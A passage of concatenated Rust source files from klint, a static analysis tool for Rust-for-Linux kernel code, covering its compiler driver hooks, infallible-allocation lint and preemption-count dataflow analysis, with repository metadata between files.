) -> rustc_driver::Compilation {
let cx = driver::cx::<MyCallbacks>(tcx);
// Ensure this query is run at least once, even without diagnostics emission, to
// catch duplicate item errors.
let _ = cx.klint_all_diagnostic_items();
rustc_driver::Compilation::Continue
}
}
impl driver::CallbacksExt for MyCallbacks {
type ExtCtxt<'tcx> = AnalysisCtxt<'tcx>;
fn ext_cx<'tcx>(&mut self, tcx: TyCtxt<'tcx>) -> Self::ExtCtxt<'tcx> {
AnalysisCtxt::new(tcx)
}
fn after_codegen<'tcx>(&mut self, cx: &'tcx AnalysisCtxt<'tcx>) {
let outputs = cx.output_filenames(());
if outputs.outputs.contains_key(&OutputType::Object) {
binary_analysis::binary_analysis(cx, outputs.path(OutputType::Object).as_path());
}
}
}
fn main() {
let handler = EarlyDiagCtxt::new(ErrorOutputType::default());
rustc_driver::init_logger(&handler, rustc_log::LoggerConfig::from_env("KLINT_LOG"));
let args: Vec<_> = std::env::args().collect();
driver::run_compiler(&args, MyCallbacks);
}
rustc_fluent_macro::fluent_messages! { "./messages.ftl" }
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/driver.rs | src/driver.rs | //! Contains hacks that changes the flow of compiler.
use std::any::Any;
use std::sync::{Arc, LazyLock, Mutex};
use rustc_codegen_ssa::traits::CodegenBackend;
use rustc_codegen_ssa::{CodegenResults, TargetConfig};
use rustc_data_structures::fx::{FxHashMap, FxIndexMap};
use rustc_data_structures::sync::{DynSend, DynSync};
use rustc_driver::{Callbacks, Compilation};
use rustc_interface::Config;
use rustc_interface::interface::Compiler;
use rustc_metadata::EncodedMetadata;
use rustc_metadata::creader::MetadataLoaderDyn;
use rustc_middle::dep_graph::{WorkProduct, WorkProductId};
use rustc_middle::ty::TyCtxt;
use rustc_middle::util::Providers;
use rustc_session::config::{Options, OutputFilenames, PrintRequest};
use rustc_session::{EarlyDiagCtxt, Session};
pub trait CallbacksExt: Callbacks + Send + 'static {
type ExtCtxt<'tcx>: DynSend + DynSync;
/// Create a new context that extends `TyCtxt`.
fn ext_cx<'tcx>(&mut self, _tcx: TyCtxt<'tcx>) -> Self::ExtCtxt<'tcx>;
fn after_codegen<'tcx>(&mut self, _cx: &'tcx Self::ExtCtxt<'tcx>) {}
}
/// Mapping from `TyCtxt<'tcx>` to `Ctxt<'tcx>`.
static TCX_EXT_MAP: LazyLock<Mutex<FxHashMap<usize, Box<dyn Any + Send + Sync>>>> =
LazyLock::new(|| Mutex::new(FxHashMap::default()));
struct CallbackWrapper<C> {
callback: Arc<Mutex<C>>,
}
impl<C: CallbacksExt> Callbacks for CallbackWrapper<C> {
fn config(&mut self, config: &mut Config) {
self.callback.lock().unwrap().config(config);
let make_codegen_backend = config.make_codegen_backend.take().unwrap_or_else(|| {
Box::new(|opts: &Options, target| {
let early_dcx = EarlyDiagCtxt::new(opts.error_format);
rustc_interface::util::get_codegen_backend(
&early_dcx,
&opts.sysroot,
opts.unstable_opts.codegen_backend.as_deref(),
target,
)
})
});
// By default, Rust starts codegen with a TyCtxt, but then leaves `TyCtxt` and join
// codegen. This is useful to reduce memory consumption while building, but also means that
// we will no longer have access to `TyCtxt` when we want to lint based on the generated
// binary. We therefore hook the backend so that the whole process is done with `TyCtxt`
// still present.
let callback_clone = self.callback.clone();
config.make_codegen_backend = Some(Box::new(|opts, target| {
let codegen_backend = make_codegen_backend(opts, target);
Box::new(BackendWrapper {
backend: codegen_backend,
callback: callback_clone,
})
}));
}
fn after_crate_root_parsing(
&mut self,
compiler: &Compiler,
krate: &mut rustc_ast::Crate,
) -> Compilation {
self.callback
.lock()
.unwrap()
.after_crate_root_parsing(compiler, krate)
}
fn after_expansion<'tcx>(&mut self, compiler: &Compiler, tcx: TyCtxt<'tcx>) -> Compilation {
let mut callback = self.callback.lock().unwrap();
// This is the first opportunity that we've got a `tcx`.
// Register the extension here.
let cx = Box::new(callback.ext_cx(tcx));
// SAFETY: this is a lifetime extension needed to store it into our hashmap.
// This can be obtained by `cx` function below, which would give it a lifetime of `'tcx`.
//
// We use a hook to destroy this before `TyCtxt<'tcx>` is gone in `codegen_crate`. That is
// the very last function to execute before `TyCtxt::finish` (assuming that no providers hook into it...)
let cx_lifetime_ext: Box<C::ExtCtxt<'static>> = unsafe { std::mem::transmute(cx) };
let cx_dyn: Box<dyn Any> = cx_lifetime_ext;
// SAFETY: horrible trick to make this actually `Sync`. However this will not actually be used
// in another thread unless `TyCtxt` is `Sync` and `DynSync` is indeed `Sync`.
let cx_sync: Box<dyn Any + Send + Sync> = unsafe { std::mem::transmute(cx_dyn) };
let tcx_addr = *tcx as *const _ as usize;
TCX_EXT_MAP.lock().unwrap().insert(tcx_addr, cx_sync);
callback.after_expansion(compiler, tcx)
}
fn after_analysis<'tcx>(&mut self, compiler: &Compiler, tcx: TyCtxt<'tcx>) -> Compilation {
self.callback.lock().unwrap().after_analysis(compiler, tcx)
}
}
pub struct BackendWrapper<C> {
backend: Box<dyn CodegenBackend>,
callback: Arc<Mutex<C>>,
}
impl<C: CallbacksExt> CodegenBackend for BackendWrapper<C> {
fn locale_resource(&self) -> &'static str {
self.backend.locale_resource()
}
fn name(&self) -> &'static str {
self.backend.name()
}
fn codegen_crate<'tcx>(&self, tcx: TyCtxt<'tcx>) -> Box<dyn Any> {
let ongoing_codegen = self.backend.codegen_crate(tcx);
let outputs = tcx.output_filenames(());
let (cg, work_map) = self
.backend
.join_codegen(ongoing_codegen, tcx.sess, outputs);
// `tcx` is going to destroyed. Let's get back the copy.
let tcx_addr = *tcx as *const _ as usize;
let cx = TCX_EXT_MAP.lock().unwrap().remove(&tcx_addr).unwrap();
assert!(cx.is::<C::ExtCtxt<'static>>());
// SAFETY: we just check the (type-erased) type matches.
let cx = unsafe { Box::from_raw(Box::into_raw(cx) as *mut C::ExtCtxt<'tcx>) };
// SAFETY: one last lifetime extension just to make the signature nice.
// This is fine as `tcx` is going to be destroyed.
self.callback
.lock()
.unwrap()
.after_codegen(unsafe { &*&raw const *cx });
Box::new((cg, work_map))
}
fn join_codegen(
&self,
ongoing_codegen: Box<dyn Any>,
_sess: &Session,
_outputs: &OutputFilenames,
) -> (CodegenResults, FxIndexMap<WorkProductId, WorkProduct>) {
*ongoing_codegen.downcast().unwrap()
}
fn init(&self, sess: &Session) {
self.backend.init(sess)
}
fn print(&self, req: &PrintRequest, out: &mut String, sess: &Session) {
self.backend.print(req, out, sess)
}
fn target_config(&self, sess: &Session) -> TargetConfig {
self.backend.target_config(sess)
}
fn print_passes(&self) {
self.backend.print_passes()
}
fn print_version(&self) {
self.backend.print_version()
}
fn metadata_loader(&self) -> Box<MetadataLoaderDyn> {
self.backend.metadata_loader()
}
fn provide(&self, providers: &mut Providers) {
self.backend.provide(providers)
}
fn link(
&self,
sess: &Session,
codegen_results: CodegenResults,
metadata: EncodedMetadata,
outputs: &OutputFilenames,
) {
self.backend.link(sess, codegen_results, metadata, outputs)
}
}
pub fn run_compiler<C: CallbacksExt>(at_args: &[String], callback: C) {
rustc_driver::run_compiler(
at_args,
&mut CallbackWrapper {
callback: Arc::new(Mutex::new(callback)),
},
);
}
/// Obtain an extended context from `TyCtxt`.
pub fn cx<'tcx, C: CallbacksExt>(tcx: TyCtxt<'tcx>) -> &'tcx C::ExtCtxt<'tcx> {
let tcx_addr = *tcx as *const _ as usize;
let guard = TCX_EXT_MAP.lock().unwrap();
let cx = guard.get(&tcx_addr).unwrap();
assert!(cx.is::<C::ExtCtxt<'static>>());
// SAFETY: we have checked that the type actually matches.
unsafe { &*(&raw const **cx as *const C::ExtCtxt<'tcx>) }
}
#[macro_export]
macro_rules! hook_query {
($provider: expr => |$tcx: ident, $query: ident, $original: ident| $content: block) => {{
static ORIGINAL: std::sync::atomic::AtomicPtr<()> =
std::sync::atomic::AtomicPtr::new(std::ptr::null_mut());
ORIGINAL.store($provider as *mut (), std::sync::atomic::Ordering::Relaxed);
$provider = |$tcx, $query| {
let ptr = ORIGINAL.load(Ordering::Relaxed);
let $original = unsafe { std::mem::transmute::<*mut (), fn(_, _) -> _>(ptr) };
// Insert a type check to ensure that the signature is indeed matching.
if false {
return $original($tcx, $query);
}
$content
};
}};
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/symbol.rs | src/symbol.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![allow(non_upper_case_globals)]
use rustc_span::Symbol;
use rustc_span::symbol::PREDEFINED_SYMBOLS_COUNT;
macro_rules! def {
($($name: ident,)*) => {
pub const EXTRA_SYMBOLS: &[&str] = &[$(stringify!($name),)*];
$(pub const $name: Symbol = Symbol::new(PREDEFINED_SYMBOLS_COUNT + ${index()});)*
// Use two glob imports to ensure that there're no conflicts between symbols here and predefined symbols;
const _: () = {
#[expect(unused)]
use rustc_span::sym::*;
use crate::symbol::*;
$(const _: Symbol = $name;)*
};
};
}
def! {
klint,
preempt_count,
drop_preempt_count,
report_preempt_count,
dump_mir,
adjust,
unchecked,
error,
write,
Write,
task,
wake,
wake_by_ref,
sort,
quicksort,
partition,
diagnostic_item,
any_context,
atomic_context,
atomic_context_only,
process_context,
build_error,
CONFIG_FRAME_WARN,
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/infallible_allocation.rs | src/infallible_allocation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_data_structures::fx::{FxHashMap, FxHashSet};
use rustc_lint::{LateContext, LateLintPass, LintContext};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::Instance;
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::source_map::Spanned;
use rustc_span::symbol::sym;
use crate::monomorphize_collector::MonoItemCollectionStrategy;
declare_tool_lint! {
pub klint::INFALLIBLE_ALLOCATION,
Warn,
""
}
declare_lint_pass!(InfallibleAllocation => [INFALLIBLE_ALLOCATION]);
fn is_generic_fn<'tcx>(instance: Instance<'tcx>) -> bool {
instance.args.non_erasable_generics().next().is_some()
}
impl<'tcx> LateLintPass<'tcx> for InfallibleAllocation {
fn check_crate(&mut self, cx: &LateContext<'tcx>) {
// Collect all mono items to be codegened with this crate. Discard the inline map, it does
// not contain enough information for us; we will collect them ourselves later.
//
// Use eager mode here so dead code is also linted on.
let access_map = super::monomorphize_collector::collect_crate_mono_items(
cx.tcx,
MonoItemCollectionStrategy::Eager,
)
.1;
// Build a forward and backward dependency graph with span information.
let mut forward = FxHashMap::default();
let mut backward = FxHashMap::<_, Vec<_>>::default();
access_map.for_each_item_and_its_used_items(|accessor, accessees| {
let accessor = match accessor {
MonoItem::Static(s) => Instance::mono(cx.tcx, s),
MonoItem::Fn(v) => v,
_ => return,
};
let fwd_list = forward
.entry(accessor)
.or_insert_with(|| Vec::with_capacity(accessees.len()));
let mut def_span = None;
for accessee in accessees {
let accessee_node = match accessee.node {
MonoItem::Static(s) => Instance::mono(cx.tcx, s),
MonoItem::Fn(v) => v,
_ => return,
};
// For const-evaluated items, they're collected from CTFE alloc, which does not have span
// information. Synthesize one with the accessor.
let span = if accessee.span.is_dummy() {
*def_span.get_or_insert_with(|| cx.tcx.def_span(accessor.def_id()))
} else {
accessee.span
};
fwd_list.push(Spanned {
node: accessee_node,
span,
});
backward.entry(accessee_node).or_default().push(Spanned {
node: accessor,
span,
});
}
});
// Find all fallible functions
let mut visited = FxHashSet::default();
for accessee in backward.keys() {
let name = cx.tcx.def_path_str(accessee.def_id());
// Anything (directly) called by assume_fallible is considered to be fallible.
if name.contains("assume_fallible") {
visited.insert(*accessee);
for accessor in forward.get(accessee).unwrap_or(&Vec::new()) {
visited.insert(accessor.node);
}
continue;
}
match name.as_str() {
// These are fallible allocation functions that return null ptr on failure.
"alloc::alloc::__rust_alloc"
| "alloc::alloc::__rust_alloc_zeroed"
| "alloc::alloc::__rust_realloc"
| "alloc::alloc::__rust_dealloc"
// Fallible allocation function
| "alloc::string::String::try_reserve"
| "alloc::string::String::try_reserve_exact" => {
visited.insert(*accessee);
}
_ => (),
}
}
let mut infallible = FxHashSet::default();
let mut work_queue = Vec::new();
for accessee in backward.keys() {
// Only go-through non-local-copy items.
// This allows us to not to be concerned about `len()`, `is_empty()`,
// because they are all inlineable.
if forward.contains_key(accessee) {
continue;
}
if cx.tcx.crate_name(accessee.def_id().krate) == sym::alloc {
// If this item originates from alloc crate, mark it as infallible.
// Add item to the allowlist above if there are false positives.
work_queue.push(*accessee);
}
}
// Propagate infallible property.
while let Some(work_item) = work_queue.pop() {
if visited.contains(&work_item) {
continue;
}
infallible.insert(work_item);
visited.insert(work_item);
// Stop at local items to prevent over-linting
if work_item.def_id().is_local() {
continue;
}
for accessor in backward.get(&work_item).unwrap_or(&Vec::new()) {
work_queue.push(accessor.node);
}
}
for (accessor, accessees) in forward.iter() {
// Don't report on non-local items
if !accessor.def_id().is_local() {
continue;
}
// Fast path
if !infallible.contains(accessor) {
continue;
}
for item in accessees {
let accessee = item.node;
if !accessee.def_id().is_local() && infallible.contains(&accessee) {
let is_generic = is_generic_fn(*accessor);
let generic_note = if is_generic {
format!(
" when the caller is monomorphized as `{}`",
cx.tcx
.def_path_str_with_args(accessor.def_id(), accessor.args)
)
} else {
String::new()
};
let accessee_path = cx
.tcx
.def_path_str_with_args(accessee.def_id(), accessee.args);
cx.span_lint(INFALLIBLE_ALLOCATION, item.span, |diag| {
diag.primary_message(format!(
"`{}` can perform infallible allocation{}",
accessee_path, generic_note
));
// For generic functions try to display a stacktrace until a non-generic one.
let mut caller = *accessor;
let mut visited = FxHashSet::default();
visited.insert(*accessor);
visited.insert(accessee);
while is_generic_fn(caller) {
let spanned_caller = match backward
.get(&caller)
.map(|x| &**x)
.unwrap_or(&[])
.iter()
.find(|x| !visited.contains(&x.node))
{
Some(v) => *v,
None => break,
};
caller = spanned_caller.node;
visited.insert(caller);
diag.span_note(
spanned_caller.span,
format!(
"which is called from `{}`",
cx.tcx.def_path_str_with_args(caller.def_id(), caller.args)
),
);
}
// Generate some help messages for why the function is determined to be infallible.
let mut msg: &str = &format!(
"`{}` is determined to be infallible because it",
accessee_path
);
let mut callee = accessee;
loop {
let callee_callee = match forward
.get(&callee)
.map(|x| &**x)
.unwrap_or(&[])
.iter()
.find(|x| {
infallible.contains(&x.node) && !visited.contains(&x.node)
}) {
Some(v) => v,
None => break,
};
callee = callee_callee.node;
visited.insert(callee);
diag.span_note(
callee_callee.span,
format!(
"{} calls into `{}`",
msg,
cx.tcx.def_path_str_with_args(callee.def_id(), callee.args)
),
);
msg = "which";
}
diag.note(format!("{} may call alloc_error_handler", msg));
});
}
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/dataflow.rs | src/preempt_count/dataflow.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_middle::mir::{BasicBlock, Body, TerminatorEdges, TerminatorKind};
use rustc_middle::ty::{self, Instance, TypingEnv};
use rustc_mir_dataflow::JoinSemiLattice;
use rustc_mir_dataflow::lattice::FlatSet;
use rustc_mir_dataflow::{Analysis, fmt::DebugWithContext};
use super::Error;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
/// A result type that can be used as lattice.
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum MaybeError<T, E> {
Ok(T),
Err(E),
}
impl<T: Default, E> Default for MaybeError<T, E> {
fn default() -> Self {
Self::Ok(Default::default())
}
}
impl<T, E> From<Result<T, E>> for MaybeError<T, E> {
#[inline]
fn from(value: Result<T, E>) -> Self {
match value {
Ok(v) => Self::Ok(v),
Err(e) => Self::Err(e),
}
}
}
impl<T, E> From<MaybeError<T, E>> for Result<T, E> {
#[inline]
fn from(value: MaybeError<T, E>) -> Self {
match value {
MaybeError::Ok(v) => Ok(v),
MaybeError::Err(e) => Err(e),
}
}
}
impl<T, E> MaybeError<T, E> {
#[inline]
pub fn from_result(result: Result<T, E>) -> Self {
result.into()
}
#[inline]
pub fn into_result(self) -> Result<T, E> {
self.into()
}
#[inline]
#[track_caller]
pub fn unwrap(self) -> T
where
E: std::fmt::Debug,
{
self.into_result().unwrap()
}
}
// The error type is hard coded to `Error` because we need special treatment w.r.t. `TooGeneric`.
impl<T: JoinSemiLattice> JoinSemiLattice for MaybeError<T, Error> {
fn join(&mut self, other: &Self) -> bool {
match (self, other) {
(Self::Err(Error::Error(_)), _) => false,
(this, Self::Err(Error::Error(e))) => {
*this = Self::Err(Error::Error(*e));
true
}
(Self::Err(Error::TooGeneric), _) => false,
(this, Self::Err(Error::TooGeneric)) => {
*this = Self::Err(Error::TooGeneric);
true
}
(Self::Ok(a), Self::Ok(b)) => a.join(b),
}
}
}
pub struct AdjustmentComputation<'mir, 'tcx, 'checker> {
pub checker: &'checker AnalysisCtxt<'tcx>,
pub body: &'mir Body<'tcx>,
pub typing_env: TypingEnv<'tcx>,
pub instance: Instance<'tcx>,
}
impl DebugWithContext<AdjustmentComputation<'_, '_, '_>> for MaybeError<FlatSet<i32>, Error> {}
impl<'tcx> Analysis<'tcx> for AdjustmentComputation<'_, 'tcx, '_> {
// The number here indicates the offset in relation to the function's entry point.
type Domain = MaybeError<FlatSet<i32>, Error>;
const NAME: &'static str = "atomic context";
fn bottom_value(&self, _body: &Body<'tcx>) -> Self::Domain {
MaybeError::Ok(FlatSet::Bottom)
}
fn initialize_start_block(&self, _body: &Body<'tcx>, state: &mut Self::Domain) {
*state = MaybeError::Ok(FlatSet::Elem(0));
}
fn apply_primary_statement_effect(
&self,
_state: &mut Self::Domain,
_statement: &rustc_middle::mir::Statement<'tcx>,
_location: rustc_middle::mir::Location,
) {
}
fn apply_primary_terminator_effect<'mir>(
&self,
state: &mut Self::Domain,
terminator: &'mir rustc_middle::mir::Terminator<'tcx>,
location: rustc_middle::mir::Location,
) -> TerminatorEdges<'mir, 'tcx> {
// Skip all unwinding paths.
if self.body.basic_blocks[location.block].is_cleanup {
return terminator.edges();
}
let MaybeError::Ok(bounds) = state else {
return terminator.edges();
};
let adjustment = match &terminator.kind {
TerminatorKind::Call { func, .. } => {
let callee_ty = func.ty(self.body, self.checker.tcx);
let callee_ty = self.instance.instantiate_mir_and_normalize_erasing_regions(
self.checker.tcx,
self.typing_env,
ty::EarlyBinder::bind(callee_ty),
);
if let ty::FnDef(def_id, args) = *callee_ty.kind() {
if let Some(v) = self.checker.preemption_count_annotation(def_id).adjustment {
// Fast path, no need to resolve the instance.
// This also avoids `TooGeneric` when def_id is an trait method.
Ok(v)
} else {
match ty::Instance::try_resolve(
self.checker.tcx,
self.typing_env,
def_id,
args,
)
.unwrap()
{
Some(instance) => {
self.checker.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Call(terminator.source_info.span),
});
let result = self
.checker
.instance_adjustment(self.typing_env.as_query_input(instance));
self.checker.call_stack.borrow_mut().pop();
result
}
None => Err(Error::TooGeneric),
}
}
} else {
Ok(crate::atomic_context::INDIRECT_DEFAULT.0)
}
}
TerminatorKind::Drop { place, .. } => {
let ty = place.ty(self.body, self.checker.tcx).ty;
let ty = self.instance.instantiate_mir_and_normalize_erasing_regions(
self.checker.tcx,
self.typing_env,
ty::EarlyBinder::bind(ty),
);
self.checker.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Drop {
drop_span: terminator.source_info.span,
place_span: self.body.local_decls[place.local].source_info.span,
},
});
let result = self
.checker
.drop_adjustment(self.typing_env.as_query_input(ty));
self.checker.call_stack.borrow_mut().pop();
result
}
_ => return terminator.edges(),
};
let adjustment = match adjustment {
Ok(v) => v,
Err(e) => {
// Too generic, need to bail out and retry after monomorphization.
*state = MaybeError::Err(e);
return terminator.edges();
}
};
*bounds = match *bounds {
FlatSet::Bottom => unreachable!(),
FlatSet::Elem(v) => FlatSet::Elem(v + adjustment),
FlatSet::Top => FlatSet::Top,
};
terminator.edges()
}
fn apply_call_return_effect(
&self,
_state: &mut Self::Domain,
_block: BasicBlock,
_return_places: rustc_middle::mir::CallReturnPlaces<'_, 'tcx>,
) {
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/annotation.rs | src/preempt_count/annotation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def::DefKind;
use rustc_hir::def_id::{CrateNum, DefId, DefIndex};
use rustc_hir::definitions::DefPathData;
use rustc_span::sym;
use crate::attribute::PreemptionCount;
use crate::ctxt::AnalysisCtxt;
impl<'tcx> AnalysisCtxt<'tcx> {
fn preemption_count_annotation_fallback(&self, def_id: DefId) -> PreemptionCount {
match self.crate_name(def_id.krate) {
// Happens in a test environment where build-std is not enabled.
sym::core | sym::alloc | sym::std => (),
_ => {
warn!(
"Unable to retrieve preemption count annotation of non-local function {:?}",
def_id
);
}
}
Default::default()
}
fn core_out_of_band_annotation(&self, def_id: DefId) -> PreemptionCount {
if self.def_kind(def_id) == DefKind::AssocFn
&& let Some(impl_) = self.impl_of_assoc(def_id)
{
let self_ty = self.type_of(impl_);
let Some(fn_name) = self.def_path(def_id).data.last().copied() else {
return Default::default();
};
let DefPathData::ValueNs(fn_name) = fn_name.data else {
return Default::default();
};
if let Some(adt_def) = self_ty.skip_binder().ty_adt_def()
&& let data = self.def_path(adt_def.did()).data
&& data.len() == 3
&& let DefPathData::TypeNs(crate::symbol::task) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::wake) = data[1].data
&& let DefPathData::TypeNs(sym::Waker) = data[2].data
{
if fn_name == sym::clone
|| fn_name == crate::symbol::wake
|| fn_name == crate::symbol::wake_by_ref
{
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
}
return Default::default();
}
let data = self.def_path(def_id).data;
if data.len() == 3
&& let DefPathData::TypeNs(sym::any) = data[0].data
&& let DefPathData::TypeNs(sym::Any) = data[1].data
&& let DefPathData::ValueNs(_any_fn) = data[2].data
{
// This is a `core::any::Any::_` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(crate::symbol::error) = data[0].data
&& let DefPathData::TypeNs(sym::Error) = data[1].data
&& let DefPathData::ValueNs(_any_fn) = data[2].data
{
// This is a `core::error::Error::_` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(fmt) = data[0].data
&& fmt == sym::fmt
&& let DefPathData::TypeNs(_fmt_trait) = data[1].data
&& let DefPathData::ValueNs(fmt_fn) = data[2].data
&& fmt_fn == sym::fmt
{
// This is a `core::fmt::Trait::fmt` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 3
&& let DefPathData::TypeNs(sym::fmt) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::Write) = data[1].data
&& let DefPathData::ValueNs(_write_fn) = data[2].data
{
// This is a `core::fmt::Write::write_{str, char, fmt}` function.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: false,
};
}
if data.len() == 2
&& let DefPathData::TypeNs(sym::fmt) = data[0].data
&& let DefPathData::ValueNs(crate::symbol::write) = data[1].data
{
// This is `core::fmt::write` function, which uses function pointers internally.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
if data.len() == 5
&& let DefPathData::TypeNs(sym::slice) = data[0].data
&& let DefPathData::TypeNs(crate::symbol::sort) = data[1].data
&& let DefPathData::TypeNs(sym::unstable) = data[2].data
&& let DefPathData::TypeNs(crate::symbol::quicksort) = data[3].data
&& let DefPathData::ValueNs(crate::symbol::partition) = data[4].data
{
// HACK: `core::sort::unstable::quicksort::partition` uses a const fn to produce a
// function pointer which is called at runtime. This means that it'll guarantee to be
// the same function, so in theory we could see through and check, but this is
// currently beyond klint's ability.
//
// Given this is an internal function and it's only called by `quicksort`, which
// already calls into `is_less` in other means, we shouldn't need to depend on
// `partition` to deduce correct property.
return PreemptionCount {
adjustment: Some(0),
expectation: Some(super::ExpectationRange::top()),
unchecked: true,
};
}
Default::default()
}
}
memoize!(
pub fn preemption_count_annotation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
) -> PreemptionCount {
if cx.crate_name(def_id.krate) == sym::core {
return cx.core_out_of_band_annotation(def_id);
}
let Some(local_def_id) = def_id.as_local() else {
if let Some(v) = cx.sql_load::<preemption_count_annotation>(def_id) {
return v;
}
return cx.preemption_count_annotation_fallback(def_id);
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::PreemptionCount(pc) => {
return *pc;
}
_ => (),
}
}
Default::default()
}
);
impl crate::ctxt::PersistentQuery for preemption_count_annotation {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
memoize!(
pub fn drop_preemption_count_annotation<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
) -> PreemptionCount {
let Some(local_def_id) = def_id.as_local() else {
if let Some(v) = cx.sql_load::<drop_preemption_count_annotation>(def_id) {
return v;
}
return cx.preemption_count_annotation_fallback(def_id);
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::DropPreemptionCount(pc) => {
return *pc;
}
_ => (),
}
}
Default::default()
}
);
impl crate::ctxt::PersistentQuery for drop_preemption_count_annotation {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
memoize!(
pub fn should_report_preempt_count<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> bool {
let Some(local_def_id) = def_id.as_local() else {
return false;
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::ReportPreeptionCount => return true,
_ => (),
}
}
false
}
);
memoize!(
pub fn should_dump_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> bool {
let Some(local_def_id) = def_id.as_local() else {
return false;
};
let hir_id = cx.local_def_id_to_hir_id(local_def_id);
for attr in cx.klint_attributes(hir_id).iter() {
match attr {
crate::attribute::KlintAttribute::DumpMir => return true,
_ => (),
}
}
false
}
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/check.rs | src/preempt_count/check.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::LangItem;
use rustc_hir::def_id::DefId;
use rustc_infer::traits::util::PredicateSet;
use rustc_middle::mir::interpret::{AllocId, ErrorHandled, GlobalAlloc, Scalar};
use rustc_middle::mir::{self, Body, Location, visit::Visitor as MirVisitor};
use rustc_middle::ty::adjustment::PointerCoercion;
use rustc_middle::ty::{
self, GenericArgs, GenericParamDefKind, Instance, PseudoCanonicalInput, Ty, TyCtxt,
TypeFoldable, TypeVisitableExt, TypingEnv, Upcast,
};
use rustc_span::{DUMMY_SP, Span};
use super::Error;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
struct MirNeighborVisitor<'mir, 'tcx, 'cx> {
cx: &'cx AnalysisCtxt<'tcx>,
body: &'mir Body<'tcx>,
typing_env: TypingEnv<'tcx>,
instance: Instance<'tcx>,
result: Result<(), Error>,
}
impl<'mir, 'tcx, 'cx> MirNeighborVisitor<'mir, 'tcx, 'cx> {
fn monomorphize<T: TypeFoldable<TyCtxt<'tcx>> + Clone>(&self, v: T) -> T {
self.instance.instantiate_mir_and_normalize_erasing_regions(
self.cx.tcx,
self.typing_env,
ty::EarlyBinder::bind(v),
)
}
fn check_vtable_unsizing(
&mut self,
source_ty: Ty<'tcx>,
target_ty: Ty<'tcx>,
span: Span,
) -> Result<(), Error> {
let ty::Dynamic(source_trait_ref, ..) = source_ty.kind() else {
bug!()
};
let ty::Dynamic(target_trait_ref, ..) = target_ty.kind() else {
bug!()
};
